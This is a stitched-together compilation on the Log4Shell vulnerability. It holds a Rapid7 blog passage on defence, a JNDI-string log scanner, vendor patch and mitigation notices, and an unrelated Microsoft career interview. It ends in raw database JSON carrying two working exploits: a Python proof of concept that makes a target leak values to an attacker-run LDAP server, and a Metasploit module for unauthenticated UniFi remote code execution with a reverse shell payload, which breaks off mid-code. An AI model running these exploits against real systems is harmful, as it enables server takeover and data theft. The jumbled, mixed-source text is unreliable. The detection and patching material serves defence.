Amid this increase in activity, vulnerable instances of Log4j are anything but gone from the internet. In fact, data from [Sonatype](<https://www.sonatype.com/resources/log4j-vulnerability-resource-center>) as of February 16, 2022 indicates 39% of Log4j downloads are _still_ versions vulnerable to Log4Shell.

"We're going to be seeing Log4j attempts on the internet, on the regular, at a low level, forever," Bob said. Log4Shell is now in a family with WannaCry and Conficker (yes, that Conficker): vulnerabilities that are around indefinitely, and which we'll need to continually monitor for as attackers use them to try to breach our defenses.

## Navigating life with Log4Shell

Adopting a defense-in-depth posture in the "new normal" of life with Log4Shell is sure to come with its share of headaches. Luckily, Bob, Devin, and Glenn shared some practical strategies that security teams can adopt to keep their organizations' defenses strong and avoid some common pitfalls.

### Go beyond compensating controls

"My vendor says they've removed the JNDI class from the JAR file. Does that mean their application is no longer vulnerable to Log4Shell?" This question came up in a few different forms from our webinar audience. The answer from our panelists was nuanced but crystal-clear: maybe for now, but not forever.

Removing the JNDI class is a compensating control, one that provides a quick fix for the vulnerability but doesn't patch the core, underlying problem via a full update. For example, when you restore from a backup, you might unknowingly reintroduce the JNDI class after removing it, or, as Devin pointed out, an attacker could chain together a replacement for it.

These kinds of compensating or mitigating controls have their place in a short-term response, but there's simply no action that can replace the work of upgrading all instances of Log4j to the most up-to-date versions that contain patches for Log4Shell.

"Mitigate for speed, but not in perpetuity," Glenn recommended.

### Find the nooks and crannies

Today's cloud-centric IT environments are increasingly ephemeral and on-demand, a boost for innovation and speed, but one that also means teams can deploy workloads without security teams ever knowing about it. Adopting an "Always Be Scanning" mindset, as Bob put it, is essential to ensure vulnerable instances of Log4j aren't introduced into your environment.

Continually scanning your internet-facing components is a good and necessary start, but the work doesn't end there. As Devin pointed out, finding the nooks and crannies where Log4j might crop up is critical. This includes scouring containers and virtual machines, as well as analyzing application and server logs for malicious JNDI strings. You should also ensure your [security operations center (SOC)](<https://www.rapid7.com/fundamentals/security-operations-center/>) team can quickly and easily identify indicators that your environment is being scanned for reconnaissance into Log4Shell exploit opportunities.

"Involving the SOC team for alerting purposes, if you haven't already done that, is an absolute necessity in this case," said Devin.

### Get better at vendor management

It should be clear by now that in a post-Log4j world, organizations must demand the highest possible level of visibility into their software supply chain, and that means being clear, even tough, with vendors.

"Managing stuff on the internet is hard because organizations are chaotic beings by nature, and you're trying to control the chaos as a security professional," said Bob. Setting yourself up for success in this context means having the highest level of visibility possible. After all, how many other vulnerabilities just as bad as Log4Shell, or even worse, might be out there lurking in the corners of your vendors' code?

The upcoming US government requirements around [Software Bill of Materials (SBOM)](<https://www.federalregister.gov/documents/2021/06/02/2021-11592/software-bill-of-materials-elements-and-considerations>) for vendor procurement should go a long way toward raising expectations for software vendors. Start asking vendors if they can produce an SBOM that details remediation and update of any vulnerable instances of Log4j.

These conversations don't need to be adversarial; in fact, vendors can be a key resource in the effort to defend against Log4Shell. Especially for smaller organizations or under-resourced security teams, relying on capable third parties can be a smart way to bolster your defenses.

## Only you can secure the software supply chain

OK, maybe that subhead is not literally true: a secure software supply chain is a community-wide effort, to which we must all hold each other accountable. The cloud-based digital ecosystem we all inhabit, whether we like it or not, is fundamentally interconnected. A pervasive vulnerability like Log4Shell is an unmistakable reminder of that fact.

It also serves as an opportunity to raise our expectations of ourselves, our organizations, and our partners, and those choices do start at home, with each security team as they update their applications, continually scan their environments, and demand visibility from their vendors. Those actions really do help create a more secure internet for everyone.

So while we'll be living with Log4Shell probably forever, it'll be living with us, too. And as scared as you are of the spider, it's even more scared of your boot.

_Want to go more in-depth? Check out the full replay of our webinar, "[Log4Shell Two Months Later: Lessons and Insights for Protectors](<https://information.rapid7.com/Log4Shell-Two-Months-Later.html>)."_

**Quick resources:**

Bob, Devin, and Glenn mentioned a wealth of handy links in their discussion. Here are those resources for quick, easy reference.

 * [CISA's Log4j Affected Database spreadsheet](<https://docs.google.com/spreadsheets/u/1/d/1jidw2hK4zeIwjR5kdzqRzYT04GWP6LSTGLoXvSRSENE/edit?usp=drive_web&ouid=112199732671088168182>)
 * [CISA's Log4j Affected Database table](<https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md>)
 * [CISA Known Exploited Vulnerabilities (KEV) catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)
 * [Project Doppler](<https://www.rapid7.com/research/project-doppler/>)
 * [ShadowServer](<https://www.shadowserver.org/>)
 * [SBOM information from the US government](<https://www.federalregister.gov/documents/2021/06/02/2021-11592/software-bill-of-materials-elements-and-considerations>)

_**Additional reading:**_

 * _[How InsightAppSec Detects Log4Shell: Your Questions Answered](<https://www.rapid7.com/blog/post/2022/02/15/how-insightappsec-detects-log4shell-your-questions-answered/>)_
 * _[Open-Source Security: Getting to the Root of the Problem](<https://www.rapid7.com/blog/post/2022/01/19/open-source-security-getting-to-the-root-of-the-problem/>)_
 * _[Active Exploitation of VMware Horizon Servers](<https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/>)_
 * _[Log4Shell Strategic Response: 5 Practices for Vulnerability Management at Scale](<https://www.rapid7.com/blog/post/2022/01/07/log4shell-strategic-response-5-practices-for-vulnerability-management-at-scale/>)_
 * _[The Everyperson's Guide to Log4Shell (CVE-2021-44228)](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)_
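The log review that the "Find the nooks and crannies" section above calls for (analyzing server logs for JNDI strings so the SOC can spot scanning), as an added example that is not Rapid7's code: it resolves the nested-lookup obfuscations commonly used in Log4Shell scanning traffic (lower/upper and default-value lookups, URL encoding) before matching, so one finding is produced per JNDI lookup string. The access-log lines are constructed for the example and the host names are placeholders.

```python
"""Added example (not Rapid7's code): flag Log4Shell-style JNDI lookup strings
in web server logs, including the nested-lookup obfuscations seen in scanning
traffic.  The sample log lines are constructed; host names are placeholders."""
import re
from urllib.parse import unquote

# An innermost ${...} lookup: one with no further ${ inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once obfuscation has been stripped, with the schemes Log4j can reach.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:", re.I)

# Constructed combined-format access log lines (client IP is the first field).
SAMPLE_LOG = [
    '203.0.113.10 - - [16/Feb/2022:10:00:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [16/Feb/2022:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid:1389/a}"',
    '198.51.100.7 - - [16/Feb/2022:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://example.invalid/b}"',
    '198.51.100.8 - - [16/Feb/2022:10:00:04 +0000] "GET /?x=${${env:NOPE:-j}ndi:rmi://example.invalid/c} HTTP/1.1" 400 0 "-" "-"',
    '198.51.100.9 - - [16/Feb/2022:10:00:05 +0000] "GET /%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fexample.invalid%2Fd%7D HTTP/1.1" 404 0 "-" "-"',
]


def _resolve(body):
    """Evaluate one innermost lookup the way Log4j would, for the subset used
    to hide the word 'jndi': ${lower:x}, ${upper:x} and default values such
    as ${env:UNSET:-j} or ${::-j}.  Returns None for anything else."""
    kind, _, rest = body.partition(":")
    kind = kind.lower()
    if kind == "jndi":
        return None                       # this is the payload itself; keep it
    if kind == "lower":
        return rest.lower()
    if kind == "upper":
        return rest.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]     # unresolvable lookup falls back to its default
    return None


def normalize(text, max_rounds=20):
    """Undo URL encoding (twice, for double-encoded payloads) and collapse
    nested lookups from the inside out until nothing changes."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        changed = False

        def replace(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNERMOST.sub(replace, text)
        if not changed:
            break
    return text


def scan_line(line):
    """Return a finding for a line carrying a JNDI lookup, else None."""
    normalized = normalize(line)
    match = JNDI.search(normalized)
    if not match:
        return None
    return {
        "source": line.split(" ", 1)[0],
        "scheme": match.group(1).lower(),
        "evidence": normalized[match.start():match.start() + 60],
    }


def scan_log(lines):
    """Findings for every line in `lines`, in log order."""
    return [finding for finding in map(scan_line, lines) if finding]
```

Counting findings per source over a window is the cheap scanning indicator: here 198.51.100.7 alone accounts for two distinct lookup strings.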

---

**Source:** openSUSE security announcement OPENSUSE-SU-2021:3999-1, "Security update for log4j (important)" (published 2021-12-12; https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/5KJHAK7MUO47JBMMPGGMJ3EKQX3P7TAO/; CVE-2021-44228)

An update that fixes one vulnerability is now available.

Description:

This update for log4j fixes the following issues:

- CVE-2021-44228: Fix a remote code execution vulnerability that existed in the LDAP JNDI parser.
  [bsc#1193611, CVE-2021-44228]

Patch Instructions:

To install this openSUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- openSUSE Leap 15.3:

  zypper in -t patch openSUSE-SLE-15.3-2021-3999=1

---

**Source:** Wallarm lab, "Log4j 0day mitigation update CVE-2021-44228" (published 2021-12-10; https://lab.wallarm.com/cve-2021-44228-mitigation-update/)

 * Wallarm has rolled out the update to detect and mitigate CVE-2021-44228.
 * No additional actions are required from customers.
 * Attempts at exploitation will be automatically blocked in blocking mode.
 * When working in monitoring mode, consider creating a virtual patch.

## Log4Shell

A 0-day exploit in the Java core library log4j was discovered that results in [Remote Code Execution](<https://www.wallarm.com/what/the-concept-of-rce-remote-code-execution-attack>) (RCE) through a simple one-line exploit containing a JNDI URL. Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe.

The attack surface is very wide, since it's almost impossible to find a Java project without the log4j library enabled. It affects Java-based internal services and APIs that log data received from other APIs and applications.

## Wallarm update

Wallarm automatically identifies Log4Shell exploitation attempts and logs them in the Wallarm Console. The corresponding changes were added within two hours of the first information about CVE-2021-44228 being published.

You can search for the relevant events by filtering on [CVE](<https://www.wallarm.com/what/common-vulnerabilities-and-exposures-cve>).

## Mitigation

When using Wallarm in blocking mode, these attacks will be automatically blocked. No actions are required.

When using monitoring mode, we suggest creating a virtual patch. Feel free to reach out to support@wallarm.com if you need assistance.

The post [Log4j 0day mitigation update CVE-2021-44228](<https://lab.wallarm.com/cve-2021-44228-mitigation-update/>) appeared first on [Wallarm](<https://lab.wallarm.com>).

---

**Source:** Microsoft Security blog, Voice of the Community series (record last seen 2022-01-20)

_The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats.
In the latest post of our Voice of the Community blog series, [Microsoft Security](<https://www.microsoft.com/en-us/security/business>) Product Marketing Manager [Natalia Godyla](<https://www.linkedin.com/in/nataliagodyla/>) talks with [Heath Adams](<https://www.linkedin.com/in/heathadams/>), Chief Executive Officer (CEO) at [TCM Security](<https://tcm-sec.com/>), about being a mentor, hiring new security talent, certifications, upskilling, the future of [cybersecurity training](<https://www.microsoft.com/security/blog/2021/10/21/defenders-wanted-building-the-new-cybersecurity-professionals/>), and lots more._

**Natalia: What do you recommend to security leaders concerned with the talent shortfall?**

**Heath:** There needs to be more openness and getting away from gatekeeping. In this industry, there's a lot of, "I went through this path, so you need to go through this path." Or "I did these certifications, so you need to do these certifications." Everybody wants this perfect candidate—somebody who has 10 years of experience—even when they don't necessarily need it. We need to be able to take somebody that's more junior, who we can help train. Or take someone with a clean slate.

As a manager, be open to more than just what's on the Human Resources job description. And be open to new people with different backgrounds. People are coming from all walks of life and age groups. So, if you put those biases aside and just consider the person that's in front of you, that will help with the job shortage and help close the talent gap.

**Natalia: And how has the pandemic and the shift to hybrid work changed cybersecurity skilling?**

**Heath:** I think it's been a positive. In our field, the ability to work remotely was always there. But the pandemic shifted things, so more companies are starting to realize that fact. I've worked jobs as a penetration tester where I had to relocate, even though I was working out of my home 95 percent of the time. Now, more companies are opening their eyes to talent that isn't local. You no longer have to look in big markets; you can look at somebody on the other side of the country who's studying cybersecurity, and they can be an asset to your team.

I was doing a lot of Twitch streaming during the shutdown, and I noticed our streams were way bigger than before. We had more people watching, more people interested. There's a lot of people who took advantage of the shutdown to say, "Hey, this is my time to get focused. I want a new career." There are high-paying jobs and there's remote work. And as I mentioned, you don't need a specific background or degree to get into this field. People can come from all walks of life. I think the pandemic helped shine a light on that.

**Natalia: You're well known as The Cyber Mentor. How has mentoring impacted your career?**

**Heath:** It keeps me on top of my game. I have to be able to give people direction and I don't want to give out bad information, so I'm making sure that I stay on top of what the industry changes are, where the jobs are heading, and how to interview properly—all of which seem to change from year to year. It helps me stay in touch with the next generation that's coming into the [security field](<https://www.microsoft.com/en-us/security>) as well.

**Natalia: Do you have your own mentors that help you progress in your career?**

**Heath:** I came up with what I call "community mentorship." I have a Discord community, and we use that to encourage other people to give back. You want to be able to help people when they need it or get help when you need it while learning from each other. When it's time for networking or needing a job, that goes a long way. For me, it's more about being where there are groups of like-minded people. I've got a lot of friends that own penetration test companies, and we'll get together, have lunch, talk strategies. What are you doing? What am I doing? That's the kind of mentorship that we have with each other; just making sure we're keeping each other in check, thinking about new things.

**Natalia: What are the biggest struggles for early career mentees who are trying to grow their skills? And how can leaders address those challenges?**

**Heath:** For a person looking to get a role, there are a few things to remember. One is to make sure you're crawling before you walk, walking before you run. I'll use hacking as an example. A lot of people get excited about hacking and think it sounds awesome. "You can get paid money to hack something? I want to do that!" And they try to jump right into it without building foundational skill sets, learning the parts of a computer, or learning how to do computer networking or basic troubleshooting. What I tell people is to break and fix computers. Understand basic hardware, basic computer networking, what IP addresses are, what a subnet is. Understand some coding, like Python. You don't need a computer science background, but having those foundational skills will go a long way.

If you don't put a foundation under a house, it's going to collapse. So, you need to think about your career in the same way. You must make sure you're building a foundation. People don't realize the amount of effort that goes into getting into the field. Do your due diligence beforehand.

There's also a lot of imposter syndrome in cybersecurity. I tell people not to concern themselves with others, especially on social media. They say comparison is the thief of joy, and I truly believe that. You have to make sure you're running your own race. Even if you run the same mile as somebody else, and they finish it in 5 minutes, and you finish it in 10, you still finish the same mile. What matters is that you got there.
As long as you're trying to be better than you were yesterday, you're going to make it a lot farther than you think.\n\nFinally, cybersecurity is a field that\u2019s constantly changing. For somebody who is complacent\u2014who wants to get a degree, get a job, and then is set\u2014cybersecurity is not the right fit. Cybersecurity is for somebody who\u2019s interested in constantly learning because there are always new vulnerabilities. There was just the [Log4J vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) that caused everyone concern. I had a meeting today with a client, and if I'm not prepared, I'm letting them down. I'm letting their security down as well. I spent the weekend studying because I had to. That\u2019s the business we\u2019re in.\n\nYou must stay on top of this from an employer side as well\u2014being able to train people and keep them up to date. TCM Security has a base foundation where we want our employees to be, and then we encourage them to gain knowledge where they're most interested. I've been sent to a training that I had no interest in whatsoever and wanted to pull my hair out. As a manager, I ask, \u201cWhat do you want to learn?\u201d When I send an employee to a cybersecurity training that they\u2019re interested in, they\u2019re going to retain that information a lot better. They can then bring that information back to us, and we can use that in real-world scenarios.\n\n**Natalia: How can security leaders recruit security professionals to their teams better? What should they look out for? For example, how important are certifications?**\n\n**Heath: **For an entry-level role, [certifications are important](<https://docs.microsoft.com/en-us/learn/roles/security-engineer>). Their importance diminishes once you get into the field. 
But I'm an advocate for them; they help prove some knowledge\u2014so does having a blog, attending a conference, building a home lab, speaking at a conference, speaking at a local community group\u2014anything that says, \u201cI'm passionate about security.\u201d\n\nI have seen some entry-level roles where the interviewers have you code something, or have you fix broken code, just to make sure you logically understand what's going on. You don't have to be a developer or be able to code, but you must be able to understand what's in front of you. Having some coding challenges during the hiring process can be beneficial\u2014but it should be open book. For a security professional, using search is 90 percent of our job, honestly. If you're limiting somebody from searching online, you're setting false expectations.\n\nI go back and re-watch videos and re-read blogs all the time, because there are so many different commands, and there's no way of memorizing all of them. But you need to understand the concepts. If you understand the tool they might need to run or the concept of it, then you can search that, find the tool, and run it. That\u2019s more important.\n\n**Natalia: We've all read the statistics about burnout in the security industry. What do you recommend for leaders who want to better retain their talent?**\n\n**Heath: **You must be pro-mental health. Make sure there's ample paid time off (PTO) and encourage employees to use it. Also, make sure that your employees can take time off beyond PTO. If they're sick, they shouldn\u2019t feel like they\u2019re letting people down. That\u2019s why we have flexible schedules; we run on a 32-hour workweek. We try to give people as much time back and have a work-life balance. We also pay for training, so people can go and focus on topics they're interested in. We make sure that we're investing in our employees. It's so much more expensive to rehire and retrain. 
I'd rather invest in an employee and keep their mental health at a high level, and make sure I'm giving them all the tools and training they need to perform successfully.\n\n**Natalia: What trends have you seen in cybersecurity skilling? What do you think is coming next in terms of how security professionals are trained up, recruited, and retained?**\n\n**Heath: **There are more people interested in the field, and that's great. We're starting to see a lot more training providers and training options. Back when I started, a lot of it was just reading blog posts, and there were maybe one or two training providers. Now, there are 10 or 15.\n\nMisinformation can be out there, or outdated information. If you search online for certification companies\u2014or even look at an online post from a year ago\u2014that information could be outdated. So again, this comes back to due diligence and making sure that you're doing your research, not just relying on one source. If I was going to look for certifications to get into this field, I\u2019d look at 20 or 30 different resources, get a consensus of what polls the highest, then do my own research on those organizations. It's great job skills practice to research and make sure you understand where you need to go.\n\n## Learn more\n\nTo learn more about Microsoft Security solutions, [visit our website](<https://www.microsoft.com/en-us/security/business>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. 
Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nDisclaimer: The views expressed here are solely those of the author and do not represent the views of Microsoft Corporation.\n\nThe post [Build a stronger cybersecurity team through diversity and training](<https://www.microsoft.com/security/blog/2022/01/20/build-a-stronger-cybersecurity-team-through-diversity-and-training/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T17:00:00", "type": "mmpc", "title": "Build a stronger cybersecurity team through diversity and training", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-20T17:00:00", "id": "MMPC:BB2F5840056D55375C4A19D2FF07C695", "href": "https://www.microsoft.com/security/blog/2022/01/20/build-a-stronger-cybersecurity-team-through-diversity-and-training/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-12-14T16:48:36", 
"description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T00:00:00", "type": "packetstorm", "title": "Apache Log4j2 2.14.1 Information Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T00:00:00", "id": "PACKETSTORM:165261", "href": "https://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html", "sourceData": "`# Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure \n# Date: 12/12/2021 \n# Exploit Author: leonjza \n# Vendor Homepage: https://logging.apache.org/log4j/2.x/ \n# Version: <= 2.14.1 \n# CVE: CVE-2021-44228 \n \n#!/usr/bin/env python3 \n \n# Pure python ENV variable leak PoC for CVE-2021-44228 \n# Original PoC: https://twitter.com/Black2Fan/status/1470281005038817284 \n# \n# 2021 @leonjza \n \nimport argparse \nimport socketserver \nimport threading \nimport time \n \nimport requests \n \nLDAP_HEADER = b'\\x30\\x0c\\x02\\x01\\x01\\x61\\x07\\x0a\\x01\\x00\\x04\\x00\\x04\\x00\\x0a' \n \n \nclass ThreadedTCPRequestHandler(socketserver.BaseRequestHandler): \ndef handle(self) -> 
None: \nprint(f' i| new connection from {self.client_address[0]}') \n \nsock = self.request \nsock.recv(1024) \nsock.sendall(LDAP_HEADER) \n \ndata = sock.recv(1024) \ndata = data[9:] # strip header \n \n# example response \n# \n# ('Java version 11.0.13\\n' \n# '\\x01\\x00\\n' \n# '\\x01\\x03\\x02\\x01\\x00\\x02\\x01\\x00\\x01\\x01\\x00\\x0b' \n# 'objectClass0\\x00\\x1b0\\x19\\x04\\x172.16.840.1.113730.3.4.2') \n \ndata = data.decode(errors='ignore').split('\\n')[0] \nprint(f' v| extracted value: {data}') \n \n \nclass ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): \npass \n \n \ndef main(): \nparser = argparse.ArgumentParser(description='a simple log4j \n<=2.14 information disclosure poc ' \n'(ref: \nhttps://twitter.com/Black2Fan/status/1470281005038817284)') \nparser.add_argument('--target', '-t', required=True, help='target uri') \nparser.add_argument('--listen-host', default='0.0.0.0', \nhelp='exploit server host to listen on \n(default: 127.0.0.1)') \nparser.add_argument('--listen-port', '-lp', default=8888, \nhelp='exploit server port to listen on (default: 8888)') \nparser.add_argument('--exploit-host', '-eh', required=True, \ndefault='127.0.0.1', \nhelp='host where (this) exploit server is reachable') \nparser.add_argument('--leak', '-l', default='${java:version}', \nhelp='value to leak. 
' \n'see: \nhttps://twitter.com/Rayhan0x01/status/1469571563674505217 ' \n'(default: ${java:version})') \nargs = parser.parse_args() \n \nprint(f' i| starting server on {args.listen_host}:{args.listen_port}') \nserver = ThreadedTCPServer((args.listen_host, args.listen_port), \nThreadedTCPRequestHandler) \n \nserv_thread = threading.Thread(target=server.serve_forever) \nserv_thread.daemon = True \nserv_thread.start() \ntime.sleep(1) \nprint(f' i| server started') \n \npayload = f'${{jndi:ldap://{args.exploit_host}:{args.listen_port}/{args.leak}}}' \nprint(f' i| sending exploit payload {payload} to {args.target}') \n \ntry: \nr = requests.get(args.target, headers={'User-Agent': payload}) \nprint(f' i| response status code: {r.status_code}') \nprint(f' i| response: {r.text}') \nexcept Exception as e: \nprint(f' e| failed to make request: {e}') \nfinally: \nserver.shutdown() \nserver.server_close() \n \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/165261/log4j22141-disclose.txt"}, {"lastseen": "2022-01-24T15:14:37", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-24T00:00:00", "type": "packetstorm", "title": "UniFi Network Application Unauthenticated Log4Shell Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-24T00:00:00", "id": "PACKETSTORM:165673", "href": "https://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::JndiInjection \ninclude Msf::Exploit::Remote::HttpClient \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(_info = {}) \nsuper( \n'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)', \n'Description' => %q{ \nThe Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell \nvulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the \n/api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java \nobject. This results in OS command execution in the context of the server application. \n \nThis module will start an LDAP server that the target will need to connect to. 
\n}, \n'Author' => [ \n'Spencer McIntyre', # this exploit module and JNDI/LDAP lib stuff \n'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff \n'Nicholas Anastasi' # Unifi research \n], \n'References' => [ \n[ 'CVE', '2021-44228' ], \n[ 'URL', 'https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi' ], \n[ 'URL', 'https://github.com/puzzlepeaches/Log4jUnifi' ], \n[ 'URL', 'https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1' ] \n], \n'DisclosureDate' => '2021-12-09', \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 8443, \n'SSL' => true, \n'WfsDelay' => 30 \n}, \n'DefaultTarget' => 1, \n'Targets' => [ \n[ \n'Windows', { \n'Platform' => 'win' \n}, \n], \n[ \n'Unix', { \n'Platform' => 'unix', \n'Arch' => [ARCH_CMD], \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n}, \n] \n], \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [IOC_IN_LOGS], \n'AKA' => ['Log4Shell', 'LogJam'], \n'Reliability' => [REPEATABLE_SESSION] \n} \n) \nregister_options([ \nOptString.new('TARGETURI', [ true, 'Base path', '/']) \n]) \nend \n \ndef wait_until(&block) \ndatastore['WfsDelay'].times do \nbreak if block.call \n \nsleep(1) \nend \nend \n \ndef check \nvalidate_configuration! \nres = send_request_cgi('uri' => normalize_uri(target_uri, 'status')) \nreturn Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil? 
\n \nserver_version = res.get_json_document.dig('meta', 'server_version') \nreturn Exploit::CheckCode::Safe('The target service does not appear to be running.') unless server_version =~ /(\\d+\\.)+/ \n \nvprint_status(\"Detected version: #{server_version}\") \nserver_version = Rex::Version.new(server_version) \nif server_version < Rex::Version.new('5.13.29') \nreturn Exploit::CheckCode::Safe('Versions prior to 5.13.29 are not exploitable.') \nelsif server_version > Rex::Version.new('6.5.53') \nreturn Exploit::CheckCode::Safe('Versions after 6.5.53 are patched and not affected.') \nend \n \nvprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...') \n \nstart_service \nres = trigger \nreturn Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil? \n \nwait_until { @search_received } \n@search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.') \nensure \nstop_service \nend \n \ndef build_ldap_search_response_payload \nreturn [] if @search_received \n \n@search_received = true \n \nreturn [] unless @exploiting \n \nprint_good('Delivering the serialized Java object to execute the payload...') \nbuild_ldap_search_response_payload_inline('BeanFactory') \nend \n \ndef trigger \n@search_received = false \n# HTTP request initiator \nsend_request_cgi( \n'uri' => normalize_uri(target_uri, 'api', 'login'), \n'method' => 'POST', \n'ctype' => 'application/json', \n'data' => { \n'username' => rand_text_alphanumeric(8..16), # can not be blank!, \n'password' => rand_text_alphanumeric(8..16), # can not be blank! \n'remember' => jndi_string, \n'strict' => true \n}.to_json \n) \nend \n \ndef exploit \nvalidate_configuration! \n \n@exploiting = true \nstart_service \nres = trigger \nfail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil? 
